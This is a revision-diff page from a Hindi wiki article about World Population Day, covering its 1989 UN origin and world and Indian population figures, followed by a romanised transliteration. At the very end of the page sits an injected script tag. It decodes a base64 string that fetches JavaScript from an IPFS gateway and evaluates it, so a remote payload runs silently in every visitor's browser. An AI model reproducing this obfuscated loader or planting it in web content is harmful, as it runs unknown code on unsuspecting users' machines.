Difference between revisions of "विश्व जनसंख्या दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''विश्व जनसंख्या दिवस''' प्रत्येक [[वर्ष]] [[11 जुलाई]] को मनाया जाता है। अत्यधिक तेज़ गति से बढ़ती जनसंख्या के प्रति लोगों में जागरूकता लाने के उद्देश्य से ही यह दिवस मनाया जाता है। यह जागरूकता मानव समाज की नई पीढ़ियों को बेहतर जीवन देने का संदेश देती है। बच्चों को बेहतर शिक्षा, स्वास्थ्य, वातावरण सहित अन्य आवश्यक सुविधाएँ भविष्य में देने के लिए छोटे परिवार की महती आवश्यकता निरन्तर बढ़ती जा रही है। प्राकृतिक संसाधनों का समुचित दोहन कर मानव समाज को सर्वश्रेष्ठ बनाए रखने और हर इंसान के भीतर इन्सानियत को बरकरार रखने के लिए यह बहुत जरूरी हो गया है कि 'विश्व जनसंख्या दिवस' की महत्ता को समझा जाए।  
 
'''विश्व जनसंख्या दिवस''' प्रत्येक [[वर्ष]] [[11 जुलाई]] को मनाया जाता है। अत्यधिक तेज़ गति से बढ़ती जनसंख्या के प्रति लोगों में जागरूकता लाने के उद्देश्य से ही यह दिवस मनाया जाता है। यह जागरूकता मानव समाज की नई पीढ़ियों को बेहतर जीवन देने का संदेश देती है। बच्चों को बेहतर शिक्षा, स्वास्थ्य, वातावरण सहित अन्य आवश्यक सुविधाएँ भविष्य में देने के लिए छोटे परिवार की महती आवश्यकता निरन्तर बढ़ती जा रही है। प्राकृतिक संसाधनों का समुचित दोहन कर मानव समाज को सर्वश्रेष्ठ बनाए रखने और हर इंसान के भीतर इन्सानियत को बरकरार रखने के लिए यह बहुत जरूरी हो गया है कि 'विश्व जनसंख्या दिवस' की महत्ता को समझा जाए।  
 +
==शुरुआत==
  
 +
'विश्व जनसंख्या दिवस' की शुरूआत 'संयुक्त राष्ट्र संघ' के विकास कार्यक्रम की 'गवर्निंग काउन्सिल' द्वारा वर्ष [[1989]] में की गई थी। जनहित को दृष्टिगत रखकर इस दिवस का प्रारंभ विश्व की जनसंख्या लगभग 5 अरब होने पर किया गया था। आज विश्व की जनसंख्या लगभग 7 अरब से भी ज़्यादा है। [[भारत]] की जनसंख्या लगभग 1 अरब, 21 करोड़, 1 लाख, 93 हज़ार, 422 है। भारत की पिछले दशक की जनसंख्या वृद्धि दर 17.64 प्रतिशत है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 09:23, 9 July 2013

vishv janasankhya divas pratyek varsh 11 julaee ko manaya jata hai. atyadhik tez gati se badhati janasankhya ke prati logoan mean jagarookata lane ke uddeshy se hi yah divas manaya jata hai. yah jagarookata manav samaj ki nee pidhiyoan ko behatar jivan dene ka sandesh deti hai. bachchoan ko behatar shiksha, svasthy, vatavaran sahit any avashyak suvidhaean bhavishy mean dene ke lie chhote parivar ki mahati avashyakata nirantar badhati ja rahi hai. prakritik sansadhanoan ka samuchit dohan kar manav samaj ko sarvashreshth banae rakhane aur har iansan ke bhitar insaniyat ko barakarar rakhane ke lie yah bahut jaroori ho gaya hai ki 'vishv janasankhya divas' ki mahatta ko samajha jae.

shuruat

'vishv janasankhya divas' ki shurooat 'sanyukt rashtr sangh' ke vikas karyakram ki 'gavarniang kaunsil' dvara varsh 1989 mean ki gee thi. janahit ko drishtigat rakhakar is divas ka praranbh vishv ki janasankhya lagabhag 5 arab hone par kiya gaya tha. aj vishv ki janasankhya lagabhag 7 arab se bhi zyada hai. bharat ki janasankhya lagabhag 1 arab, 21 karo d, 1 lakh, 93 hazar, 422 hai. bharat ki pichhale dashak ki janasankhya vriddhi dar 17.64 pratishat hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>